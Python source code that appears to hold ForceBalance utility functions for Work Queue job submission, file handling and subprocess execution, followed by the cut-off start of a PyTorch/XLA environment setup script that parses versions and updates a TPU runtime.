    WORK_QUEUE.specify_name(name)
    # QYD: prefer the worker that is fastest in previous tasks
    # another choice is first-come-first serve: WORK_QUEUE_SCHEDULE_FCFS
    WORK_QUEUE.specify_algorithm(work_queue.WORK_QUEUE_SCHEDULE_TIME)
    # QYD: We don't want to specify the following extremely long keepalive times
    # because they will prevent checking "dead" workers, causing the program to wait forever
    #WORK_QUEUE.specify_keepalive_timeout(8640000)
    #WORK_QUEUE.specify_keepalive_interval(8640000)
def destroyWorkQueue():
    # Convenience function to destroy the Work Queue objects.
    # Resets both the queue handle and the task-ID bookkeeping so that a
    # fresh queue can be created afterwards.
    global WORK_QUEUE, WQIDS
    WORK_QUEUE = None
    WQIDS = defaultdict(list)
def queue_up(wq, command, input_files, output_files, tag=None, tgt=None, verbose=True, print_time=60):
    """
    Submit a job to the Work Queue.

    @param[in] wq (Work Queue Object)
    @param[in] command (string) The command to run on the remote worker.
    @param[in] input_files (list of files) A list of locations of the input files.
    @param[in] output_files (list of files) A list of locations of the output files.
    @param[in] tag Job tag; defaults to the command string itself.
    @param[in] tgt Target object whose name is used to record the task ID.
    @param[in] verbose Whether to log the submission.
    @param[in] print_time Completion-logging threshold attached to the task.
    """
    global WQIDS
    task = work_queue.Task(command)
    here = os.getcwd()
    # Local paths live in the current directory; remote names are bare file names.
    for fnm in input_files:
        task.specify_input_file(os.path.join(here, fnm), fnm, cache=False)
    for fnm in output_files:
        task.specify_output_file(os.path.join(here, fnm), fnm, cache=False)
    if tag is None:
        tag = command
    task.specify_tag(tag)
    task.print_time = print_time
    taskid = wq.submit(task)
    if verbose:
        logger.info("Submitting command '%s' to the Work Queue, %staskid %i\n" % (command, "tag %s, " % tag if tag != command else "", taskid))
    key = tgt.name if tgt is not None else "None"
    WQIDS[key].append(taskid)
def queue_up_src_dest(wq, command, input_files, output_files, tag=None, tgt=None, verbose=True, print_time=60):
    """
    Submit a job to the Work Queue.  This function is a bit fancier in that we can explicitly
    specify where the input files come from, and where the output files go to.

    @param[in] wq (Work Queue Object)
    @param[in] command (string) The command to run on the remote worker.
    @param[in] input_files (list of 2-tuples) A list of local and
    remote locations of the input files.
    @param[in] output_files (list of 2-tuples) A list of local and
    remote locations of the output files.
    """
    global WQIDS
    task = work_queue.Task(command)
    for local, remote in input_files:
        task.specify_input_file(local, remote, cache=False)
    for local, remote in output_files:
        task.specify_output_file(local, remote, cache=False)
    if tag is None:
        tag = command
    task.specify_tag(tag)
    task.print_time = print_time
    taskid = wq.submit(task)
    if verbose:
        logger.info("Submitting command '%s' to the Work Queue, taskid %i\n" % (command, taskid))
    key = tgt.name if tgt is not None else "None"
    WQIDS[key].append(taskid)
def wq_wait1(wq, wait_time=10, wait_intvl=1, print_time=60, verbose=False):
    """ Wait up to wait_time seconds (polling every wait_intvl seconds) for Work Queue tasks to finish.

    Failed tasks are resubmitted and their new IDs re-recorded in WQIDS;
    completed tasks are removed from WQIDS.  Queue statistics are logged.

    @param[in] wq The Work Queue object to poll.
    @param[in] wait_time Total number of seconds to wait.
    @param[in] wait_intvl Polling interval in seconds.
    @param[in] print_time Only completed tasks longer than this many seconds are logged.
    @param[in] verbose Whether to log detailed per-task and statistics info.
    """
    global WQIDS
    if verbose: logger.info('---\n')
    if wait_intvl >= wait_time:
        wait_time = wait_intvl
        numwaits = 1
    else:
        numwaits = int(wait_time/wait_intvl)
    for _ in range(numwaits):
        task = wq.wait(wait_intvl)
        if task:
            exectime = task.cmd_execution_time/1000000
            if verbose:
                logger.info('A job has finished!\n')
                # Bug fix: these task fields are not all strings, so the
                # previous '+' concatenation raised TypeError; use
                # %-formatting (and consistent trailing newlines) instead.
                logger.info('Job name = %s command = %s\n' % (task.tag, task.command))
                logger.info("status = %s\n" % task.status)
                logger.info("return_status = %s\n" % task.return_status)
                logger.info("result = %s\n" % task.result)
                logger.info("host = %s\n" % task.hostname)
                logger.info("execution time = %s\n" % exectime)
                logger.info("total_bytes_transferred = %s\n" % task.total_bytes_transferred)
            if task.result != 0:
                # Task failed: resubmit it and update the bookkeeping.
                oldid = task.id
                oldhost = task.hostname
                tgtname = "None"
                for tnm in WQIDS:
                    if task.id in WQIDS[tnm]:
                        tgtname = tnm
                        WQIDS[tnm].remove(task.id)
                taskid = wq.submit(task)
                logger.warning("Task '%s' (task %i) failed on host %s (%i seconds), resubmitted: taskid %i\n" % (task.tag, oldid, oldhost, exectime, taskid))
                WQIDS[tgtname].append(taskid)
            else:
                if hasattr(task, 'print_time'):
                    print_time = task.print_time
                if exectime > print_time: # Assume that we're only interested in printing jobs that last longer than a minute.
                    logger.info("Task '%s' (task %i) finished successfully on host %s (%i seconds)\n" % (task.tag, task.id, task.hostname, exectime))
                for tnm in WQIDS:
                    if task.id in WQIDS[tnm]:
                        WQIDS[tnm].remove(task.id)
            del task
    # LPW 2018-09-10 Updated to use stats fields from CCTools 6.2.10
    # Please upgrade CCTools version if errors are encountered during runtime.
    if verbose:
        logger.info("Workers: %i init, %i idle, %i busy, %i total joined, %i total removed\n" \
            % (wq.stats.workers_init, wq.stats.workers_idle, wq.stats.workers_busy, wq.stats.workers_joined, wq.stats.workers_removed))
        logger.info("Tasks: %i running, %i waiting, %i dispatched, %i submitted, %i total complete\n" \
            % (wq.stats.tasks_running, wq.stats.tasks_waiting, wq.stats.tasks_dispatched, wq.stats.tasks_submitted, wq.stats.tasks_done))
        logger.info("Data: %i / %i kb sent/received\n" % (int(wq.stats.bytes_sent/1024), int(wq.stats.bytes_received/1024)))
    else:
        logger.info("\r%s : %i/%i workers busy; %i/%i jobs complete \r" %\
            (time.ctime(), wq.stats.workers_busy, wq.stats.workers_connected, wq.stats.tasks_done, wq.stats.tasks_submitted))
        if time.time() - wq_wait1.t0 > 900:
            wq_wait1.t0 = time.time()
            logger.info('\n')
wq_wait1.t0 = time.time()
def wq_wait(wq, wait_time=10, wait_intvl=10, print_time=60, verbose=False):
    """ Block until every task in the Work Queue has completed. """
    # Keep polling in wait_time-sized chunks until the queue reports empty.
    while not wq.empty():
        wq_wait1(wq, wait_time=wait_time, wait_intvl=wait_intvl, print_time=print_time, verbose=verbose)
#=====================================#
#| File and process management stuff |#
#=====================================#
def click():
    """ Stopwatch function: return the seconds elapsed since the previous call. """
    now = time.time()
    elapsed = now - click.t0
    # Reset the reference point for the next call.
    click.t0 = now
    return elapsed
click.t0 = time.time()
# Back up a file.
def bak(path, dest=None):
    """Back up 'path' by moving it to '<base>_<i><ext>' in 'dest' (or its own
    directory), choosing the smallest i that does not collide.

    Returns the new file name, or None when 'path' does not exist."""
    if not os.path.exists(path):
        return None
    dnm, fnm = os.path.split(path)
    if dnm == '':
        dnm = '.'
    base, ext = os.path.splitext(fnm)
    if dest is None:
        dest = dnm
    if not os.path.isdir(dest):
        os.makedirs(dest)
    # Probe successive suffixes until we find a free slot.
    idx = 1
    while True:
        candidate = os.path.join(dest, "%s_%i%s" % (base, idx, ext))
        if not os.path.exists(candidate):
            break
        idx += 1
    logger.info("Backing up %s -> %s\n" % (path, candidate))
    shutil.move(path, candidate)
    return candidate
# Purpose: Given a file name and/or an extension, do one of the following:
# 1) If provided a file name, check the file, crash if not exist and err==True. Return the file name.
# 2) If list is empty but extension is provided, check if one file exists that matches
# the extension. If so, return the file name.
# 3) If list is still empty and err==True, then crash with an error.
def onefile(fnm=None, ext=None, err=False):
    """Resolve a file specification to a single file name in the current directory.

    1) If 'fnm' is given and exists, return its base name, first copying the
       file into the current directory when it lives elsewhere (crashing if a
       different file of the same name is already here).
    2) If 'fnm' is absent/missing but 'ext' is given, look for exactly one
       file with that extension in the current directory.
    3) On failure, raise RuntimeError if err is True, otherwise return None.

    @param[in] fnm Explicit file name (may be a path outside the current directory)
    @param[in] ext Extension to auto-detect by when fnm is absent or missing
    @param[in] err Whether failure to resolve a unique file is a fatal error
    @return The base name of the resolved file, or None
    """
    if fnm is None and ext is None:
        if err:
            logger.error("Must provide either filename or extension to onefile()")
            raise RuntimeError
        else:
            return None
    if fnm is not None:
        if os.path.exists(fnm):
            if os.path.dirname(os.path.abspath(fnm)) != os.getcwd():
                fsrc = os.path.abspath(fnm)
                fdest = os.path.join(os.getcwd(), os.path.basename(fnm))
                #-----
                # If the file path doesn't correspond to the current directory, copy the file over
                # If the file exists in the current directory already and it's different, then crash.
                #-----
                if os.path.exists(fdest):
                    if not filecmp.cmp(fsrc, fdest):
                        logger.error("onefile() will not overwrite %s with %s\n" % (os.path.join(os.getcwd(), os.path.basename(fnm)),os.path.abspath(fnm)))
                        raise RuntimeError
                    else:
                        logger.info("\x1b[93monefile() says the files %s and %s are identical\x1b[0m\n" % (os.path.abspath(fnm), os.getcwd()))
                else:
                    logger.info("\x1b[93monefile() will copy %s to %s\x1b[0m\n" % (os.path.abspath(fnm), os.getcwd()))
                    shutil.copy2(fsrc, fdest)
            return os.path.basename(fnm)
        elif err==True or ext is None:
            logger.error("File specified by %s does not exist!" % fnm)
            raise RuntimeError
        elif ext is not None:
            warn_once("File specified by %s does not exist - will try to autodetect .%s extension" % (fnm, ext))
    # Fall through to extension-based autodetection in the current directory.
    answer = None
    cwd = os.getcwd()
    ls = [i for i in os.listdir(cwd) if i.endswith('.%s' % ext)]
    if len(ls) != 1:
        if err:
            logger.error("Cannot find a unique file with extension .%s in %s (%i found; %s)" % (ext, cwd, len(ls), ' '.join(ls)))
            raise RuntimeError
        else:
            warn_once("Cannot find a unique file with extension .%s in %s (%i found; %s)" %
                      (ext, cwd, len(ls), ' '.join(ls)), warnhash = "Found %i .%s files" % (len(ls), ext))
    else:
        answer = os.path.basename(ls[0])
        warn_once("Autodetected %s in %s" % (answer, cwd), warnhash = "Autodetected %s" % answer)
    return answer
# Purpose: Given a file name / file list and/or an extension, do one of the following:
# 1) If provided a file list, check each file in the list
# and crash if any file does not exist. Return the list.
# 2) If provided a file name, check the file and crash if the file
# does not exist. Return a length-one list with the file name.
# 3) If list is empty but extension is provided, check for files that
# match the extension. If so, append them to the list.
# 4) If list is still empty and err==True, then crash with an error.
def listfiles(fnms=None, ext=None, err=False, dnm=None):
    """Canonicalize a file specification into a list of base file names.

    1) If 'fnms' is a list, every file in it must exist; the list is used.
    2) If 'fnms' is a string, that file must exist; a one-element list is used.
    3) If the result is empty and 'ext' is given, all files ending in '.ext'
       in the current directory are used.
    4) If the result is still empty and err is True, raise RuntimeError.
    Files living outside the current directory are copied in (crashing if a
    different file of the same name already exists here).

    @param[in] fnms A file name, list of file names, or None
    @param[in] ext Extension to search for when fnms yields nothing
    @param[in] err Whether an empty result is a fatal error
    @param[in] dnm Optional directory to operate in (cwd is restored at the end)
    @return List of base file names
    """
    answer = []
    cwd = os.path.abspath(os.getcwd())
    if dnm is not None:
        os.chdir(dnm)
    if isinstance(fnms, list):
        for i in fnms:
            if not os.path.exists(i):
                logger.error('Specified %s but it does not exist' % i)
                raise RuntimeError
            answer.append(i)
    elif isinstance(fnms, six.string_types):
        if not os.path.exists(fnms):
            logger.error('Specified %s but it does not exist' % fnms)
            raise RuntimeError
        answer = [fnms]
    elif fnms is not None:
        logger.info(str(fnms))
        logger.error('First argument to listfiles must be a list, a string, or None')
        raise RuntimeError
    if answer == [] and ext is not None:
        answer = [os.path.basename(i) for i in os.listdir(os.getcwd()) if i.endswith('.%s' % ext)]
    if answer == [] and err:
        logger.error('listfiles function failed to come up with a file! (fnms = %s ext = %s)' % (str(fnms), str(ext)))
        raise RuntimeError
    for ifnm, fnm in enumerate(answer):
        if os.path.dirname(os.path.abspath(fnm)) != os.getcwd():
            fsrc = os.path.abspath(fnm)
            fdest = os.path.join(os.getcwd(), os.path.basename(fnm))
            #-----
            # If the file path doesn't correspond to the current directory, copy the file over
            # If the file exists in the current directory already and it's different, then crash.
            #-----
            if os.path.exists(fdest):
                if not filecmp.cmp(fsrc, fdest):
                    # Bug fix: these messages previously said "onefile()",
                    # a copy-paste from the sibling function above.
                    logger.error("listfiles() will not overwrite %s with %s\n" % (os.path.join(os.getcwd(), os.path.basename(fnm)),os.path.abspath(fnm)))
                    raise RuntimeError
                else:
                    logger.info("\x1b[93mlistfiles() says the files %s and %s are identical\x1b[0m\n" % (os.path.abspath(fnm), os.getcwd()))
                    answer[ifnm] = os.path.basename(fnm)
            else:
                logger.info("\x1b[93mlistfiles() will copy %s to %s\x1b[0m\n" % (os.path.abspath(fnm), os.getcwd()))
                shutil.copy2(fsrc, fdest)
                answer[ifnm] = os.path.basename(fnm)
    os.chdir(cwd)
    return answer
def extract_tar(tarfnm, fnms, force=False):
    """
    Extract a list of files from .tar archive with any compression.
    The file is extracted to the base folder of the archive.

    Parameters
    ----------
    tarfnm :
        Name of the archive file.
    fnms : str or list
        File names to be extracted.
    force : bool, optional
        If true, then force extraction of file even if they already exist on disk.
    """
    # Get path of tar file.
    fdir = os.path.abspath(os.path.dirname(tarfnm))
    # If all files exist, then return - no need to extract.
    if (not force) and all([os.path.exists(os.path.join(fdir, f)) for f in fnms]): return
    # If the tar file doesn't exist or isn't valid, do nothing.
    if not os.path.exists(tarfnm): return
    if not tarfile.is_tarfile(tarfnm): return
    # Check type of fnms argument.
    if isinstance(fnms, six.string_types): fnms = [fnms]
    # Load the tar file; ensure it is closed even if extraction fails
    # (the original leaked the archive handle).
    arch = tarfile.open(tarfnm, 'r')
    try:
        # Extract only the requested members that actually exist in the
        # archive (avoids an exception on missing names).
        members = [m for m in arch.getmembers() if m.name in fnms]
        arch.extractall(fdir, members=members)
    finally:
        arch.close()
def GoInto(Dir):
    """Change into directory 'Dir', creating it first if it does not exist.

    Raises RuntimeError if 'Dir' exists but is not a directory.
    """
    if os.path.exists(Dir):
        if not os.path.isdir(Dir):
            # Bug fix: this message previously referenced an undefined
            # variable 'newdir', raising NameError instead of reporting.
            logger.error("Tried to create directory %s, it exists but isn't a directory\n" % Dir)
            raise RuntimeError
    else:
        os.makedirs(Dir)
    os.chdir(Dir)
def allsplit(Dir):
    """Recursively split a path into the list of all its directory components."""
    head, tail = os.path.split(os.path.normpath(Dir))
    if tail in ('', '.'):
        return []
    return allsplit(head) + [tail]
def Leave(Dir):
    """Leave directory 'Dir', backing out of as many levels as 'Dir' is deep.

    Raises RuntimeError when the current directory's name does not match
    'Dir' (a sanity check against unbalanced GoInto/Leave pairs).
    """
    here = os.path.split(os.getcwd())[1]
    if here != Dir:
        logger.error("Trying to leave directory %s, but we're actually in directory %s (check your code)\n" % (Dir, here))
        raise RuntimeError
    for _ in allsplit(Dir):
        os.chdir('..')
# Dictionary containing specific error messages for specific missing files or file patterns
# Each entry pairs a list of file names (or regex patterns) with a hint about
# which package or setup step is expected to provide them.
specific_lst = [(['mdrun','grompp','trjconv','g_energy','g_traj'], "Make sure to install GROMACS and add it to your path (or set the gmxpath option)"),
                (['force.mdin', 'stage.leap'], "This file is needed for setting up AMBER force matching targets"),
                (['conf.pdb', 'mono.pdb'], "This file is needed for setting up OpenMM condensed phase property targets"),
                (['liquid.xyz', 'liquid.key', 'mono.xyz', 'mono.key'], "This file is needed for setting up OpenMM condensed phase property targets"),
                (['dynamic', 'analyze', 'minimize', 'testgrad', 'vibrate', 'optimize', 'polarize', 'superpose'], "Make sure to install TINKER and add it to your path (or set the tinkerpath option)"),
                (['runcuda.sh', 'npt.py', 'npt_tinker.py'], "This file belongs in the ForceBalance source directory, not sure why it is missing"),
                (['input.xyz'], "This file is needed for TINKER molecular property targets"),
                (['.*key$', '.*xyz$'], "I am guessing this file is probably needed by TINKER"),
                (['.*gro$', '.*top$', '.*itp$', '.*mdp$', '.*ndx$'], "I am guessing this file is probably needed by GROMACS")
                ]
# Build a dictionary mapping all of the keys in the above lists to their error messages
specific_dct = dict(list(itertools.chain(*[[(j,i[1]) for j in i[0]] for i in specific_lst])))
def MissingFileInspection(fnm):
    """Return a hint explaining why a missing file might be needed.

    Matches the base name of 'fnm' against the patterns in specific_dct and
    collects the matching advice strings.  Returns "" when nothing matches.

    @param[in] fnm Path of the missing file
    @return A (possibly empty) newline-prefixed string of hints
    """
    fnm = os.path.split(fnm)[1]
    answer = ""
    for key in specific_dct:
        if re.match(key, fnm):
            # Bug fix: the leading newline used to be added unconditionally
            # on the first loop iteration, so even a lookup with no matches
            # returned "\n" instead of an empty string.
            if answer == "":
                answer += "\n"
            answer += "%s\n" % specific_dct[key]
    return answer
def wopen(dest, binary=False):
    """ Open 'dest' for writing; if it is a symbolic link, remove it first. """
    if os.path.islink(dest):
        logger.warning("Trying to write to a symbolic link %s, removing it first\n" % dest)
        os.unlink(dest)
    mode = 'wb' if binary else 'w'
    return open(dest, mode)
def LinkFile(src, dest, nosrcok = False):
    """Create a symbolic link from 'src' to 'dest', replacing broken links.

    Does nothing when src and dest resolve to the same path, or when dest is
    already a valid symlink.  Raises RuntimeError when dest exists as a
    non-link, or when src is missing (unless nosrcok is True).
    """
    if os.path.abspath(src) == os.path.abspath(dest):
        return
    if not os.path.exists(src):
        if nosrcok:
            return
        logger.error("Tried to create symbolic link %s to %s, but source file doesn't exist%s\n" % (src,dest,MissingFileInspection(src)))
        raise RuntimeError
    if os.path.islink(dest) and not os.path.exists(dest):
        # Destination is a dangling link: clear it out and relink.
        os.remove(dest)
        os.symlink(src, dest)
    elif os.path.exists(dest):
        if not os.path.islink(dest):
            logger.error("Tried to create symbolic link %s to %s, destination exists but isn't a symbolic link\n" % (src, dest))
            raise RuntimeError
    else:
        os.symlink(src, dest)
def CopyFile(src, dest):
    """Copy 'src' to 'dest' (with metadata), refusing to clobber a symlink.

    Raises RuntimeError if 'src' is missing or if 'dest' exists as a symbolic
    link.  NOTE(review): when 'dest' exists as a regular file, this function
    silently does nothing (no copy, no error) -- presumably intentional
    "keep the existing file" behavior, but worth confirming with callers.
    """
    if os.path.exists(src):
        if os.path.exists(dest):
            if os.path.islink(dest):
                logger.error("Tried to copy %s to %s, destination exists but it's a symbolic link\n" % (src, dest))
                raise RuntimeError
        else:
            shutil.copy2(src, dest)
    else:
        logger.error("Tried to copy %s to %s, but source file doesn't exist%s\n" % (src,dest,MissingFileInspection(src)))
        raise RuntimeError
def link_dir_contents(abssrcdir, absdestdir):
    """Symlink every file (and any 'IC' subdirectory) of abssrcdir into absdestdir.

    Dangling links in the destination are removed first; existing entries are
    otherwise left alone.
    """
    for entry in os.listdir(abssrcdir):
        srcpath = os.path.join(abssrcdir, entry)
        dstpath = os.path.join(absdestdir, entry)
        # Clean up dangling symlinks before (re)linking.
        if os.path.islink(dstpath) and not os.path.exists(dstpath):
            os.remove(dstpath)
        wanted = os.path.isfile(srcpath) or (os.path.isdir(srcpath) and entry == 'IC')
        if wanted and not os.path.exists(dstpath):
            os.symlink(srcpath, dstpath)
def remove_if_exists(fnm):
    """ Delete the file at 'fnm' when present; silently do nothing otherwise. """
    if not os.path.exists(fnm):
        return
    os.remove(fnm)
def which(fnm):
    """Return the directory containing executable 'fnm' (looked up via the
    UNIX `which` command), or '' when not found.  UNIX-like systems only."""
    try:
        lines = os.popen('which %s 2> /dev/null' % fnm).readlines()
        return os.path.split(lines[0].strip())[0]
    except:
        # No output from `which` -> executable not on the PATH.
        return ''
# Thanks to cesarkawakami on #python (IRC freenode) for this code.
class LineChunker(object):
    """Accumulate streamed bytes and invoke a callback once per complete line.

    Pushed bytes are decoded as UTF-8 and buffered; whenever a newline or
    carriage return appears, the finished chunk (separator included) is handed
    to the callback.  Usable as a context manager, which flushes any remainder
    (with a trailing newline appended) on exit.
    """
    def __init__(self, callback):
        self.callback = callback
        self.buf = ""

    def push(self, data):
        # Py3 compatibility: incoming data arrives as bytes and must be
        # decoded before being appended to the (str) buffer.
        self.buf += data.decode('utf-8')
        self.nomnom()

    def close(self):
        if not self.buf:
            return
        self.callback(self.buf + "\n")

    def nomnom(self):
        # Emit every complete line currently buffered, keeping the line
        # separator attached to its line.
        while "\n" in self.buf or "\r" in self.buf:
            chunk, sep, self.buf = re.split(r"(\r|\n)", self.buf, maxsplit=1)
            self.callback(chunk + sep)

    def __enter__(self):
        return self

    def __exit__(self, *args, **kwargs):
        self.close()
def _exec(command, print_to_screen = False, outfnm = None, logfnm = None, stdin = "", print_command = True, copy_stdout = True, copy_stderr = False, persist = False, expand_cr=False, print_error=True, rbytes=1, cwd=None, **kwargs):
    """Runs command line using subprocess, optionally returning stdout.
    Options:
    command (required) = Name of the command you want to execute
    print_to_screen = Mirror the output to the terminal as it is produced.
    outfnm (optional) = Name of the output file name (overwritten if exists)
    logfnm (optional) = Name of the log file name (appended if exists)
    stdin (optional) = A string to be passed to stdin, as if it were typed (use newline character to mimic Enter key)
    print_command = Whether to print the command.
    copy_stdout = Copy the stdout stream; can set to False in strange situations
    copy_stderr = Copy the stderr stream to the stdout stream; useful for GROMACS which prints out everything to stderr (argh.)
    expand_cr = Whether to expand carriage returns into newlines (useful for GROMACS mdrun).
    print_error = Whether to print error messages on a crash. Should be true most of the time.
    persist = Continue execution even if the command gives a nonzero return code.
    rbytes = Number of bytes to read from stdout and stderr streams at a time. GMX requires rbytes = 1 otherwise streams are interleaved. Higher values for speed.
    cwd = Working directory for the child process; outfnm/logfnm are then resolved relative to it.
    kwargs = Any additional keyword arguments are passed through to subprocess.Popen.
    Returns the captured stdout as a list of lines; the exit status is stored
    in the function attribute _exec.returncode.
    """
    # Dictionary of options to be passed to the Popen object.
    cmd_options={'shell':isinstance(command, six.string_types), 'stdin':PIPE, 'stdout':PIPE, 'stderr':PIPE, 'universal_newlines':expand_cr, 'cwd':cwd}
    # If the current working directory is provided, the outputs will be written to there as well.
    if cwd is not None:
        if outfnm is not None:
            outfnm = os.path.abspath(os.path.join(cwd, outfnm))
        if logfnm is not None:
            logfnm = os.path.abspath(os.path.join(cwd, logfnm))
    # "write to file" : Function for writing some characters to the log and/or output files.
    def wtf(out):
        if logfnm is not None:
            with open(logfnm,'ab+') as f:
                f.write(out.encode('utf-8'))
                f.flush()
        if outfnm is not None:
            # The function attribute wtf.first makes the very first write
            # truncate the output file; every later write appends.
            with open(outfnm,'wb+' if wtf.first else 'ab+') as f:
                f.write(out.encode('utf-8'))
                f.flush()
        wtf.first = False
    wtf.first = True
    # Preserve backwards compatibility; sometimes None gets passed to stdin.
    if stdin is None: stdin = ""
    if print_command:
        logger.info("Executing process: \x1b[92m%-50s\x1b[0m%s%s%s%s\n" % (' '.join(command) if type(command) is list else command,
                                                                          " In: %s" % cwd if cwd is not None else "",
                                                                          " Output: %s" % outfnm if outfnm is not None else "",
                                                                          " Append: %s" % logfnm if logfnm is not None else "",
                                                                          (" Stdin: %s" % stdin.replace('\n','\\n')) if stdin else ""))
        wtf("Executing process: %s%s\n" % (command, (" Stdin: %s" % stdin.replace('\n','\\n')) if stdin else ""))
    cmd_options.update(kwargs)
    p = subprocess.Popen(command, **cmd_options)
    # Write the stdin stream to the process.
    p.stdin.write(stdin.encode('ascii'))
    p.stdin.close()
    #===============================================================#
    #| Read the output streams from the process. This is a bit     |#
    #| complicated because programs like GROMACS tend to print out |#
    #| stdout as well as stderr streams, and also carriage returns |#
    #| along with newline characters.                              |#
    #===============================================================#
    # stdout and stderr streams of the process.
    streams = [p.stdout, p.stderr]
    # These are functions that take chunks of lines (read) as inputs.
    # Captured text accumulates in the function attributes process_out.stdout
    # and process_err.stderr (lists of chunks, joined after the loop).
    def process_out(read):
        # NOTE(review): str(read.encode('utf-8')) prints the b'...' repr on
        # Py3 — probably should write `read` directly; confirm intended.
        if print_to_screen: sys.stdout.write(str(read.encode('utf-8')))
        if copy_stdout:
            process_out.stdout.append(read)
            wtf(read)
    process_out.stdout = []
    def process_err(read):
        if print_to_screen: sys.stderr.write(str(read.encode('utf-8')))
        process_err.stderr.append(read)
        if copy_stderr:
            process_out.stdout.append(read)
            wtf(read)
    process_err.stderr = []
    # This reads the streams one byte at a time, and passes it to the LineChunker
    # which splits it by either newline or carriage return.
    # If the stream has ended, then it is removed from the list.
    with LineChunker(process_out) as out_chunker, LineChunker(process_err) as err_chunker:
        while True:
            to_read, _, _ = select(streams, [], [])
            for fh in to_read:
                if fh is p.stdout:
                    # Read rbytes first, then one extra byte at a time until
                    # the accumulated bytes form a decodable UTF-8 sequence
                    # (a multi-byte character may straddle the read boundary).
                    read_nbytes = 0
                    read = ''.encode('utf-8')
                    while True:
                        if read_nbytes == 0:
                            read += fh.read(rbytes)
                            read_nbytes += rbytes
                        else:
                            read += fh.read(1)
                            read_nbytes += 1
                        if read_nbytes > 10+rbytes:
                            raise RuntimeError("Failed to decode stdout from external process.")
                        if not read:
                            streams.remove(p.stdout)
                            p.stdout.close()
                            break
                        else:
                            try:
                                out_chunker.push(read)
                                break
                            except UnicodeDecodeError:
                                pass
                elif fh is p.stderr:
                    # Same decode-retry dance for the stderr stream.
                    read_nbytes = 0
                    read = ''.encode('utf-8')
                    while True:
                        if read_nbytes == 0:
                            read += fh.read(rbytes)
                            read_nbytes += rbytes
                        else:
                            read += fh.read(1)
                            read_nbytes += 1
                        if read_nbytes > 10+rbytes:
                            raise RuntimeError("Failed to decode stderr from external process.")
                        if not read:
                            streams.remove(p.stderr)
                            p.stderr.close()
                            break
                        else:
                            try:
                                err_chunker.push(read)
                                break
                            except UnicodeDecodeError:
                                pass
                else:
                    raise RuntimeError
            if len(streams) == 0: break
    p.wait()
    process_out.stdout = ''.join(process_out.stdout)
    process_err.stderr = ''.join(process_err.stderr)
    # Expose the exit status to callers via a function attribute.
    _exec.returncode = p.returncode
    if p.returncode != 0:
        if process_err.stderr and print_error:
            logger.warning("Received an error message:\n")
            logger.warning("\n[====] \x1b[91mError Message\x1b[0m [====]\n")
            logger.warning(process_err.stderr)
            logger.warning("[====] \x1b[91mEnd o'Message\x1b[0m [====]\n")
        if persist:
            if print_error:
                logger.info("%s gave a return code of %i (it may have crashed) -- carrying on\n" % (command, p.returncode))
        else:
            # This code (commented out) would not throw an exception, but instead exit with the returncode of the crashed program.
            # sys.stderr.write("\x1b[1;94m%s\x1b[0m gave a return code of %i (\x1b[91mit may have crashed\x1b[0m)\n" % (command, p.returncode))
            # sys.exit(p.returncode)
            logger.error("\x1b[1;94m%s\x1b[0m gave a return code of %i (\x1b[91mit may have crashed\x1b[0m)\n\n" % (command, p.returncode))
            raise RuntimeError
    # Return the output in the form of a list of lines, so we can loop over it using "for line in output".
    Out = process_out.stdout.split('\n')
    if Out[-1] == '':
        Out = Out[:-1]
    return Out
_exec.returncode = None
def warn_press_key(warning, timeout=10):
    """Log a warning and, when stdin is a terminal, give the user `timeout`
    seconds to acknowledge it by pressing Enter before carrying on.

    Non-interactive runs (no TTY on stdin) only log the warning.
    """
    logger.warning(warning + '\n')
    if sys.stdin.isatty():
        logger.warning("\x1b[1;91mPress Enter or wait %i seconds (I assume no responsibility for what happens after this!)\x1b[0m\n" % timeout)
        try:
            rlist, wlist, xlist = select([sys.stdin], [], [], timeout)
            if rlist:
                sys.stdin.readline()
        except Exception:
            # Best-effort pause only: select() can fail on exotic stdin objects.
            # Narrowed from a bare `except:` so KeyboardInterrupt still propagates.
            pass
def warn_once(warning, warnhash = None):
    """ Prints a warning but will only do so once in a given run. """
    # warnhash identifies the warning; by default the message text itself.
    if warnhash is None:
        warnhash = warning
    if warnhash in warn_once.already:
        return
    warn_once.already.add(warnhash)
    # isinstance() instead of `type(...) is ...` so str/list subclasses work too.
    if isinstance(warning, str):
        logger.info(warning + '\n')
    elif isinstance(warning, list):
        for line in warning:
            logger.info(line + '\n')
# Function attribute holding the set of warnings already emitted this run.
warn_once.already = set()
#=========================================#
#| Development stuff (not commonly used) |#
#=========================================#
def concurrent_map(func, data):
    """Thread-parallel analogue of the built-in map().

    One worker thread is spawned per element, so `data` must be an indexable
    sequence (not a one-shot iterable). Results come back in input order.
    """
    results = [None for _ in data]
    def worker(slot, value):
        # Each thread deposits its answer into its own pre-allocated slot.
        results[slot] = func(value)
    workers = [threading.Thread(target=worker, args=(idx, item))
               for idx, item in enumerate(data)]
    for thread in workers:
        thread.start()
    for thread in workers:
        thread.join()
    return results
|
pytorch-xla-env-setup.py | #!/usr/bin/env python
# Sample usage:
# python env-setup.py --version 1.5 --apt-packages libomp5
import argparse
import collections
from datetime import datetime
import os
import re
import requests
import subprocess
import threading
VersionConfig = collections.namedtuple('VersionConfig', ['wheels', 'tpu'])
OLDEST_VERSION = datetime.strptime('20200318', '%Y%m%d')
DIST_BUCKET = 'gs://tpu-pytorch/wheels'
TORCH_WHEEL_TMPL = 'torch-{whl_version}-cp36-cp36m-linux_x86_64.whl'
TORCH_XLA_WHEEL_TMPL = 'torch_xla-{whl_version}-cp36-cp36m-linux_x86_64.whl'
TORCHVISION_WHEEL_TMPL = 'torchvision-{whl_version}-cp36-cp36m-linux_x86_64.whl'
def update_tpu_runtime(tpu_ip, version):
  """Ask the TPU's configuration service (port 8475) to switch to `version.tpu`."""
  print(f'Updating TPU runtime to {version.tpu} ...')
  # The TPU exposes a small HTTP endpoint for runtime version switches.
  url = f'http://{tpu_ip}:8475/requestversion/{version.tpu}'
  response = requests.post(url)
  print('Done updating TPU runtime: {}'.format(response))
def get_version(version):
  """Map a user-supplied version string to a VersionConfig.

  Accepts 'nightly', a dated nightly 'YYYYMMDD' (no older than
  OLDEST_VERSION), or a dotted release such as '1.5'.

  Raises:
    ValueError: for too-old dated nightlies or malformed version strings.
  """
  if version == 'nightly':
    return VersionConfig('nightly', 'pytorch-nightly')

  version_date = None
  try:
    version_date = datetime.strptime(version, '%Y%m%d')
  except ValueError:
    pass  # Not a dated nightly.

  if version_date:
    if version_date < OLDEST_VERSION:
      raise ValueError(f'Oldest nightly version available is {OLDEST_VERSION}')
    return VersionConfig(f'nightly+{version}', f'pytorch-dev{version}')

  # Raw string: '\d' in a plain literal is an invalid escape sequence
  # (SyntaxWarning since Python 3.12); the pattern itself is unchanged.
